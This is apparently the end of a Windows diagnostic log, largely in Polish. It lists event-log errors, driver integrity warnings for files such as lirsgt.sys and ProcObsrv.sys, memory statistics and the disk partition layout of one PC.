C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc.manifest. Error: (01/04/2016 11:06:38 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: ) Description: Subscription licensing service failed: -1073418225 Error: (01/03/2016 10:16:19 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas wywoływania procedury RegSetValueExW(0x000002f4,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,00000000015EED40.72). hr = 0x80070005, Odmowa dostępu. . Dziennik System: ============= Error: (01/05/2016 08:12:17 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Process creation detector. z powodu następującego błędu: %%1275 Error: (01/05/2016 08:12:17 PM) (Source: Application Popup) (EventID: 1060) (User: ) Description: Ładowanie sterownika \??\C:\Program Files (x86)\Glary Utilities 3\ProcObsrv.sys zostało zablokowane z powodu niezgodności z tym systemem. Skontaktuj się z dostawcą oprogramowania w celu uzyskania zgodnej wersji sterownika. Error: (01/05/2016 08:11:54 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi lirsgt z powodu następującego błędu: %%577 Error: (01/05/2016 08:11:53 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi atksgt z powodu następującego błędu: %%577 Error: (01/05/2016 08:11:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi General Purpose USB Driver (e4ldrx64.sys) z powodu następującego błędu: %%1058 Error: (01/05/2016 03:33:05 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Process creation detector. z powodu następującego błędu: %%1275 Error: (01/05/2016 03:33:05 PM) (Source: Application Popup) (EventID: 1060) (User: ) Description: Ładowanie sterownika \??\C:\Program Files (x86)\Glary Utilities 3\ProcObsrv.sys zostało zablokowane z powodu niezgodności z tym systemem. Skontaktuj się z dostawcą oprogramowania w celu uzyskania zgodnej wersji sterownika. Error: (01/05/2016 03:32:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi lirsgt z powodu następującego błędu: %%577 Error: (01/05/2016 03:32:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Telex Aside Tepid z powodu następującego błędu: %%216 Error: (01/05/2016 03:32:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi atksgt z powodu następującego błędu: %%577 CodeIntegrity: =================================== Date: 2016-01-05 20:12:17.987 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Glary Utilities 3\ProcObsrv.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 20:12:17.987 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Glary Utilities 3\ProcObsrv.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 20:11:54.056 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\lirsgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 20:11:53.993 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\lirsgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 20:11:53.868 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 20:11:53.806 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 15:33:05.313 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Glary Utilities 3\ProcObsrv.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 15:33:05.313 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Glary Utilities 3\ProcObsrv.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 15:32:51.004 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\lirsgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-01-05 15:32:51.004 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\lirsgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz Procent pamięci w użyciu: 14% Całkowita pamięć fizyczna: 16330.07 MB Dostępna pamięć fizyczna: 14006.67 MB Całkowita pamięć wirtualna: 32658.29 MB Dostępna pamięć wirtualna: 30027.17 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:130.63 GB) (Free:24.26 GB) NTFS Drive d: () (Fixed) (Total:800.78 GB) (Free:737.28 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: BCF3A7FD) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=130.6 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=800.8 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================